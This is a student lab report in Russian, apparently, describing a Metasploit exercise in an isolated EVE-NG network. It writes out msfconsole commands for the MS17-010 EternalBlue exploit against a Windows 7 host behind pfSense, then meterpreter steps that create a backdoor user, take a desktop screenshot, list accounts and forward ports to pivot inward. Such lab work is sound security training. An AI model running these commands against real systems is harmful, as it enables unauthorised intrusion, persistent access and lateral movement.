# Практика №3. Эксплутация уязвимостей. MetaSplot Framework # Задание к практической работе №3 - Построить инфраструктуру в системе EVE-NG (есть возможность ее импортировать) - Настроить каждое устройство в соответсвии со следующими параметрами: - Kali-2021, Win-7, Win-10, Debian - получение адреса DHCP - На PfSense выполнить проброс с внешних 445/tcp и 3389/tcp портов на аналогичные порты win-7 виртуальной машины - Выполнить сканирование внешнего интерфейса межсетевого экрана с помощью nmap и Nessus с целью обнаружения уязвимых сервисов - Использую Metasploit Framework - получить доступ до Windows-7 виртуальной машины - Используя payload meterpreter: - выполнить создание нового пользователя - Выполнить скриншот рабочего стола - получить все учетные записи, находящиеся в памяти системы - Выполнить проксирование трафика во внутреннюю инфраструктуру # **Выполнение задания** ![](https://i.imgur.com/xzU5tJC.png) **Debian** ![](https://i.imgur.com/f9eQL3N.png) **Kali** ![](https://i.imgur.com/vrIRM1Z.png) **Windows 7** ![](https://i.imgur.com/teUFfOL.png) **Сканирование nmap** В ходе сканирования видим, что нужны нам порты открыты(445, 3389) ![](https://i.imgur.com/kqb9ZME.png) **Пробрасываем порты** ![](https://i.imgur.com/RZgHmjC.png) **Используя Metasploit Framework, получаем доступ до Win-7** Испсользуем эксплойт ExternalBlue ``` sudo msfconsole search ms17-010 use 0 set target 0 set ForceExploit set rhost 192.168.124.142 //pfsense ip run ``` ![](https://i.imgur.com/GKEt1OW.png) Для удаленного доступа пишем команду: ``` screenshare ``` ![](https://i.imgur.com/Dpu8vmu.png) Для создания нового пользователя: ``` run getgui -u semyon -p qwerty ``` ![](https://i.imgur.com/V9FbJHh.png) Список пользователей: ![](https://i.imgur.com/Eb5FZEC.png) ![](https://i.imgur.com/Cesy6uy.png) Список пользователей ``` shell net user ``` ![](https://i.imgur.com/WbQX510.png) **Проксирование трафика во внутреннюю инфраструктуру** ip Kali, любой порт, 443 порт по умолчанию используемый размещамым кэшем для приема входящих рпедложений контента от клиентов, ip pfsense на винде ``` portfwd add -L 192.168.124.135 -l 2280 -p 443 -r 192.168.1.1 ``` ![](https://i.imgur.com/a0IKAPe.png)